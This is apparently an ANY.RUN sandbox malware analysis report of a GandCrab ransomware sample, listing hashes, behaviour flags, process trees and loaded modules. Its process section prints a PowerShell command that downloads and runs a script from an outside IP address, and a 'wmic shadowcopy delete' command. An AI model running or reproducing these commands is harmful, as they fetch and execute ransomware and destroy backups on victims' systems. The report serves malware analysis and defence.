General Info

File name

test_ran.bat.zip.zip

Full analysis
https://app.any.run/tasks/7a730f6a-9af5-42b8-9506-7ae26e185d38
Verdict
Malicious activity
Analysis date
11/8/2018, 10:29:59
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

ransomware

gandcrab

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

0f2f9de6010d559b34c3143b2d6f385e

SHA1

595c99433b564f1a57553cf5ed5e5a9b9fd573c5

SHA256

da0c26e8b5431ecc98b7541919cfbb67f2f50a002d9f195375c44bfdfbc35799

SSDEEP

12:5TkfQCyj41IawO9w5b/rkkKftzXCHY2OXkWkTiTEa0n:tkyjU0O9w5GNSBAm5n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Writes file to Word startup folder
  • powershell.exe (PID: 256)
Deletes shadow copies
  • powershell.exe (PID: 256)
Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 256)
GandCrab keys found
  • powershell.exe (PID: 256)
Executes PowerShell scripts
  • cmd.exe (PID: 2372)
Actions looks like stealing of personal data
  • powershell.exe (PID: 256)
Renames files like Ransomware
  • powershell.exe (PID: 256)
Connects to CnC server
  • powershell.exe (PID: 256)
Creates files like Ransomware instruction
  • powershell.exe (PID: 256)
Starts CMD.EXE for commands execution
  • WinRAR.exe (PID: 1216)
Application launched itself
  • WinRAR.exe (PID: 3708)
Reads Internet Cache Settings
  • powershell.exe (PID: 256)
Creates files in the user directory
  • powershell.exe (PID: 256)
Reads settings of System Certificates
  • powershell.exe (PID: 256)
Application launched itself
  • chrome.exe (PID: 2792)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 256)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
788
ZipBitFlag:
0x0001
ZipCompression:
Deflated
ZipModifyDate:
2018:11:08 10:29:25
ZipCRC:
0x45b18bc3
ZipCompressedSize:
291
ZipUncompressedSize:
293
ZipFileName:
test_ran.bat.zip

Screenshots

Processes

Total processes
50
Monitored processes
16
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start winrar.exe no specs winrar.exe no specs cmd.exe no specs #GANDCRAB powershell.exe wmic.exe no specs notepad.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3708
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\program files\filezilla ftp client\fzshellext.dll

PID
1216
CMD
"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025\test_ran.bat.zip
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\acppage.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
2372
CMD
cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIb1216.44211\test_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\apphelp.dll

PID
256
CMD
powershell.exe IEX ((new-object net.webclient).downloadstring('http://198.211.105.99/kasa'));Invoke-SZYIITYRAYH;Start-Sleep -s 1000000;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll

PID
2828
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
3968
CMD
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\QZWWJFJNT-DECRYPT.txt
Path
C:\Windows\system32\NOTEPAD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Notepad
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll

PID
2792
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\hid.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\credui.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winusb.dll
c:\windows\system32\msi.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\audioses.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wpc.dll
c:\windows\system32\samlib.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\winsta.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\powrprof.dll

PID
1864
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x701100b0,0x701100c0,0x701100cc
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
